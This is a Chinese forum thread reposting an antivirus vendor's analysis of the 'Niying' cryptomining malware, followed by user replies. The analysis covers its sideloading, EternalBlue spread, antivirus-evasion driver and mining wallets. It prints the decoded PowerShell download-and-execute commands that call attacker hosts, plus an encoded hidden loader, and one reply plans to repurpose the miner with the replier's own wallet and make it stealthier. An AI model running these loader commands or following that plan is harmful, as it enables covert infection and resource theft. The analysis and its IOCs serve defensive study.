bambooslip 发表于 2020-3-21 13:49

金山毒霸:“匿影”挖矿病毒再度来袭, 小心电脑沦为他人工具!

近期,金山毒霸安全团队再次捕获到“匿影”挖矿病毒,此病毒利用白加黑手法,通过NSA泄露工具包,永恒之蓝等漏洞进行横向传播,执行powershell脚本进行挖矿,感染传播,并且释放驱动对抗杀软。此病毒主要挖门罗币和Handshake(hns),通过f2pool矿池进行挖矿。
      门罗币向来是挖矿病毒的不二之选,因为其无法被追踪,隐匿的特性,当然还有其挖矿算法支持cpu,比较“亲民”,只要是电脑就可以进行cpu挖矿,而且其价格可观。当然病毒作者选HNS的道理也大同小异,隐匿,价格,“亲民”,当然能用GPU对病毒来说是更优的选择,毕竟来钱快嘛。
http://dh1.cmcmcdn.com/duba/a/5/3/9/7/a5397dd6143d5a00e60a3278c67ee2be.png

技术分析
      “匿影”病毒家族,大部分恶意模块均采用VMP保护,包括驱动对抗程序,为提高分析的成本,增加分析难度。而且恶意病毒的下载传播的服务器空间,均使用三方服务、网盘、图床,很难捕捉其真实地址。
病毒执行流程图
http://dh1.cmcmcdn.com/duba/9/0/0/a/6/900a6ab9a392b6ccd75e83f56e36fd48.png

计划任务执行Powershell恶意脚本
      中病毒计算机计划任务被添加自动运行恶意Powershell脚本
http://dh1.cmcmcdn.com/duba/d/0/e/3/c/d0e3cbd5435681452362112f94638e08.pngPowershell命令行字符串为混淆字符串,解密后如下:

[*]IEX((new-objectnet.webclient).downloadstring('http://cs.sslsngyl90.com'))
复制代码Powershell加载执行下载后的恶意脚本,截取一些相似部分,主要功能为加载恶意PE文件,挖矿

[*](new-object System.Net.WebClient).DownloadFile( 'https://img.vim-cn.com/d2/5340ae8e92a6d29f599fef426a2bc1b5217299','C:\ProgramData\WinRing0x64.sys')(new-object System.Net.WebClient).DownloadFile( 'https://img.vim-cn.com/fd/31611086fb633acbe818d26f0dc710bb8e5350','C:\ProgramData\officekms.exe')Start-Process -FilePath C:\ProgramData\officekms.exe '-o xmr.f2pool.com:13531 -u 47XU72EwsukWYtYPqmWNuk5yYb5YzPGmMEfxG4BMMCDYYKSoKmnnQnxMx13oaVetgzZ6rYBsRSqbLZ7PcKaB2NSfQSRdZ9b -p x -k'
复制代码释放恶意PE文件
文件名功能
Officekms.exe挖矿程序
WinRing0x64.sysCPU信息检出
Gtt.exe挖矿,驱动保护
Go.exe挖矿,驱动保护
Nb.exe挖矿程序
Office.exe横向传播,漏洞利用

go.exego.exe是winrar创建的自解压程序,静默自动执行白文件XLBugReport.exe,此处利用手法为白加黑,利用迅雷模块加载病毒恶意模块。
http://dh1.cmcmcdn.com/duba/7/4/b/e/f/74befc13dfd5db0cd8690299e4ca94c3.pngXLBugReport.exe是迅雷的错误报告程序
http://dh1.cmcmcdn.com/duba/5/6/5/0/c/5650c1b4824875e882994eec9c80f28f.pngsvchost 是病毒自带模块(此处模拟系统模块命名,混淆视听svchost加载cpugpucom.dll
http://dh1.cmcmcdn.com/duba/c/1/8/d/1/c18d14b0527905f3bffd0cda46c7930b.pngcpuxmdll函数为cpugpucom.dll里面的导出函数,内存动态解密,解密后为VMP Dump
http://dh1.cmcmcdn.com/duba/2/2/9/4/1/22941187f9ff0106a5c54fac8f793ea1.png
http://dh1.cmcmcdn.com/duba/1/8/8/6/6/188664f94c6331e4703fa62e024e0b01.pngsvchost调用最终病毒解密代码载调用Officekms.exe进行挖矿
http://dh1.cmcmcdn.com/duba/9/6/e/b/2/96eb2adada3140c9446e303a71bbee86.png释放驱动文件(命名随机 VMP壳)对抗杀软和ARK工具HOOK内核回调,监控进程打开关闭
http://dh1.cmcmcdn.com/duba/e/b/5/2/c/eb52cd45397836dd0961a4baa13e908a.png

gtt.exeGtt.exe 也是winrar自解压程序,利用微软原始文件rekeywiz.exe(病毒文件名WorkstationPro.exe)文件白加黑调用自己的恶意模块duser.dll (VMP) , wininit.exe (VMP)
http://dh1.cmcmcdn.com/duba/f/2/e/7/f/f2e7fa584cf127f1eabd009ef5939799.png
http://dh1.cmcmcdn.com/duba/4/6/3/1/6/46316084861c3f401aef7d8cd38ea2e6.png以下是WorkstationPro.exe白文件,通过VT查询它被其它病毒文件的利用情况,发现被许多恶意文件利用,可见白文件,白进程可能也需要我们格外关注了,表象的背后往往有一些捉摸不清的“交易”。
http://dh1.cmcmcdn.com/duba/6/6/5/7/1/665719e484ba296b041b9cfcaf2178f9.png
http://dh1.cmcmcdn.com/duba/8/e/e/5/8/8ee58cc43fbf31d8d7e38e39c0c7e68a.pngwininit.exe (VMP)调用其它模块(officekms.exe MicrosftEdgeCP.exe)进行挖矿
http://dh1.cmcmcdn.com/duba/5/4/f/b/1/54fb12b02e69f2a53274b08ba324054c.png


[*]
[*]C:\ProgramData\officekms.exe -o xmr.f2pool.com:13531 -u 43uhqNUnb RnhnK54zH5cLKd1UjxzR8y4vbMBUwpTK4aL2uWv7jTphoR6vqhoGXDKfnQDB9qaA1 zmLSZ27mWMzU9k7YMGmGD.xx -p x -k
复制代码MicrosftEdgeCP.exe (VMP) 是nb.exe释放


[*]C:\Users\Public\MicrosftEdgeCP.exe -a hns -o stratum+tcp://hns.f2pool.com:6000 -u hs1qlxjqehrw8wth6pdwrhh0cls7y3nvpk0xdcufvw.019C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -N onI -W Hidden -ep Bypass -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB4AHgALgBlAG0AYQBpAGwAbQBpAGMAbwBwAC4AYwBsAHUAYgAnACkAKQA=
复制代码加载驱动(VMP),对抗杀软和ARK工具HOOK内核回调,监控进程打开关闭
http://dh1.cmcmcdn.com/duba/3/b/5/2/a/3b52a9478b77025df50eb1abadc34e6c.png
nb.exe功能为释放挖矿程序MicrosftEdgeCP.exe(VMP) 和 OhGodAnETHlargementPill-r2.exe
http://dh1.cmcmcdn.com/duba/3/d/1/9/f/3d19ffd3a8657bfe6e75fec7291bb853.png

office.exeoffice.exe 释放的文件主要目的为横向传播,利用永恒之蓝漏洞进行攻击
http://dh1.cmcmcdn.com/duba/2/7/c/6/9/27c69f3289f2aa5bac2099397beb77b7.pngwinlogtrf.exe为控制模块winlogtrf.exe调用永恒之蓝漏洞扫描器(开源Python版本)进行扫描
http://dh1.cmcmcdn.com/duba/5/7/f/0/a/57f0a01e319ac5a4438996498cb75000.png攻击成功,则发送payload(x64.dll)payload则会检测QQ管家,金山毒霸杀软和其它进程信息
http://dh1.cmcmcdn.com/duba/4/1/c/9/e/41c9e314e02709fbcbea2ef573f0dd5a.png
    如果没有杀软存在,则进行感染传播
http://dh1.cmcmcdn.com/duba/5/8/c/6/a/58c6a54bd3d97e1386a3a9fc4fc935a0.png

挖矿信息
门罗币此病毒主要通过f2pool矿池挖矿,所以不能直接获取其钱包地址,以下是测试账户,挖矿时是使用此矿池的地址而不是我们的钱包地址
http://dh1.cmcmcdn.com/duba/9/a/a/2/1/9aa213445fb05ad5cc46f49955e5a46c.pngf2pool门罗币的收益情况,这个地址为f2pool的挖矿地址


[*]47XU72EwsukWYtYPqmWNuk5yYb5YzPGmMEfxG4BMMCDYYKSoKmnnQnxMx13oaVetgzZ6rYBsRSqbLZ7PcKaB2NSfQSRdZ9b
复制代码这个账号在有一天可以挖0.18个大约6.6美金
http://dh1.cmcmcdn.com/duba/5/0/f/c/b/50fcbe5995af45cfa583d362aa7ca214.png
http://dh1.cmcmcdn.com/duba/a/2/d/9/3/a2d93f02763987b941d72150a3540dd7.pnghttp://dh1.cmcmcdn.com/duba/c/d/7/a/d/cd7ad0f01733bf79540946c8505afc6c.png当然他不止一个账号,当然我想可以不仅仅只有下面几个门罗币挖矿地址


[*]43BxCW7rEQBUtDudnUG1pc4sY9wvwaCCYh71wk8Lx9Vq5PtVMneSDp4fbh8HvtF4JyPtXcBGbW2FWN21b5MhZpN2REofAcy44ACdsQgNRRBLmLQAEvkVoCYAVmSpy2XsQvdvS4Srnbwf9tzrbMGEjigXbDCi8iT2LQznYV2DAzgCR6K5Y6vBth84oErPyg43uhqNUnbRnhnK54zH5cLKd1UjxzR8y4vbMBUwpTK4aL2uWv7jTphoR6vqhoGXDKfnQDB9qaA1zmLSZ27mWMzU9k7YMGmGD
复制代码挖矿方式和上面的门罗币一样也是通过f2pool进行的挖矿,挖矿f2pool地址


[*]hs1qlxjqehrw8wth6pdwrhh0cls7y3nvpk0xdcufvwhttps://www.f2pool.com/hns/hs1ql ... 0cls7y3nvpk0xdcufvw
复制代码http://dh1.cmcmcdn.com/duba/1/3/f/5/5/13f550d7d27b708eb31b2ee360f7ef22.png

以下大概一个月的收益
http://dh1.cmcmcdn.com/duba/f/0/4/2/f/f042fbe2224e6039b75c6d350f1413a9.pnghttp://dh1.cmcmcdn.com/duba/b/6/c/8/7/b6c876d7c93c37f0025b4a81bdb30fc1.png

总结:
         可见挖矿病毒的收益还是很高的,当然这只是“借你之手”的获利,病毒在挖矿的时候会导致计算机卡顿,运行其它软件速度变慢,如果你有类似症状的时候,要想想是不是中了挖矿病毒了,及时安装金山毒霸扫描查杀,以免沦为他人的“工具”。
      此病毒是通过BT下载器,激活工具等等免费破解工具进行的传播,友情提示,大家下载软件,尽量选择官方下载,第三方下载很有可能存在病毒捆绑,或者安装金山毒霸,即便不小心下载了恶意捆绑软件也可以及时查漏补缺,及时为你拦截相关病毒。
      毒霸很好地支持计划任务,powershell,等关键可疑行为的查杀拦截
http://dh1.cmcmcdn.com/duba/5/c/9/0/1/5c901d267623e038644fb79878ebbddf.jpg
IOC
MD5:
974b7dd2e5f32297ac498d4b4816014a
95dd28e23472e0f2c561b0168e4d4de3
ca8ab64cda1205f0993a84bc76ad894a
124d75d7214a16635828982c6c24b8d2
39e5b7e7a52c4f6f86f086298950c6b8
0c0195c48b6b8582fa6f6373032118daURL:
hxxp://cpu/sslsngyl90[.]com/vip.txt
hxxp://cpu.sslsngyl90[.]com/vip.txt
hxxps://img.vim-cn[.]com/d2/5340ae8e92a6d29f599fef426a2bc1b5217299
hxxps://img.vim-cn[.]com/fd/31611086fb633acbe818d26f0dc710bb8e5350
hxxps://img.vim-cn[.]com/c9/b3a8ada87d992f7ef6fe68b6ecbadc339c71a1
hxxps://img.vim-cn[.]com/82/651423b4a6a5fb251b87ebec0f44d1cd862c21

今天风好大 发表于 2020-3-21 14:40

毒王教训毒崽子

fromat 发表于 2020-3-21 14:10

宁愿被挖矿,都不会用金山这个流氓

失业 发表于 2020-3-21 14:27

什么?毒霸会杀毒?{:301_982:}

luzhiyao 发表于 2020-3-21 14:24

垃圾金山,肯定不会用。

带不走的回忆 发表于 2020-3-21 14:56

fromat 发表于 2020-3-21 14:10
宁愿被挖矿,都不会用金山这个流氓

:eeeni你太可爱了你电脑就这点价值哈哈

sharokku4869 发表于 2020-3-21 15:04

宁愿被用来挖矿也不装金山;www

点解点解 发表于 2020-3-21 15:53

多谢提供资料,把钱包改一下就可以为自已服务了,我还想改进一下,在空闲时50%挖,动键盘鼠标就暂停,这样肯定能活得长久。

上将无双 发表于 2020-3-21 14:01

感谢楼主分享
挖矿病毒确实烦人

星星之夜 发表于 2020-3-21 14:06

多谢提供思路

一叶甘棠 发表于 2020-3-21 14:25

恐怖至极

xugdawn 发表于 2020-3-21 14:28

金山就是太占内存了

scy444888 发表于 2020-3-21 14:39

前两天电脑内存突然占用特别高,重启也慢,内存提交二十多个g,16g内存完全塞满了,火绒查了半天也没结果,最后重装系统没事了
页: [1] 2 3 4 5 6 7 8 9 10
查看完整版本: 金山毒霸:“匿影”挖矿病毒再度来袭, 小心电脑沦为他人工具!


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52pojie.cn